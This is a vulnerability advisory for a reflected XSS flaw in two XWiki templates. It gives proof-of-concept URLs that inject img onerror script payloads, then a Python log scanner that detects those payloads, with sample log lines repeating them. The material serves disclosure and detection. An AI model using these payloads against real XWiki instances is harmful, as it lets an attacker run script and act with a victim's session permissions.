CVE-2025-32430: XWiki allows Reflected XSS in two templates
Reflected XSS vulnerabilities in two templates allow an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL. PoC URLs are:
/xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=<img src=1 onerror=alert(document.domain)>
/xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg src=x onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg src=x onerror=alert(document.domain)%3E
This allows the attacker to perform arbitrary actions using the permissions of the victim.
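Added detection example (not part of the advisory or of XWiki): a small scanner over web-server access logs that flags requests to the two affected templates (xpage=job_status_json and xpage=distribution) whose reflected parameters (translationPrefix, extensionId, extensionVersionConstraint) carry HTML-like content. The combined log format, the sample log lines and the HTML marker regex are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Template -> query parameters the advisory says are reflected unescaped.
VULNERABLE_PARAMS = {
    "job_status_json": {"translationPrefix"},
    "distribution": {"extensionId", "extensionVersionConstraint"},
}
# Markers of HTML/JS injection in a decoded value: a tag start, a javascript:
# URL, or an inline event handler such as onerror=  (assumed heuristic).
HTML_MARKER = re.compile(r"<\s*/?[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)
# Request line inside a combined-format access log entry: "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')


def suspicious_params(request_target):
    """Return (template, [param, ...]) when a vulnerable template is requested
    with HTML-like content in a reflected parameter, else (None, [])."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    template = query.get("xpage", [""])[0]
    watched = VULNERABLE_PARAMS.get(template)
    if not watched:
        return None, []
    hits = []
    for name in sorted(watched):
        # parse_qs already decoded once; unquote again to catch double-encoding.
        if any(HTML_MARKER.search(unquote(v)) for v in query.get(name, [])):
            hits.append(name)
    return (template, hits) if hits else (None, [])


def scan_access_log(lines):
    """Return [(line_no, template, params)] for each log line matching the pattern."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if m:
            template, hits = suspicious_params(m.group(1))
            if hits:
                findings.append((line_no, template, hits))
    return findings


# Constructed sample log lines (not from a real server): lines 1 and 3 carry the
# advisory's PoC payloads, lines 2 and 4 are benign traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2025:10:00:00 +0000] "GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/May/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=job.status HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/May/2025:10:00:02 +0000] "GET /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 200 512',
    '10.0.0.8 - - [01/May/2025:10:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome?xpage=view&foo=%3Cb%3E HTTP/1.1" 200 512',
]
```

Running scan_access_log(SAMPLE_LOG) reports lines 1 and 3 only; a hit on a patched instance is still worth reviewing, since it shows someone probing for the bug.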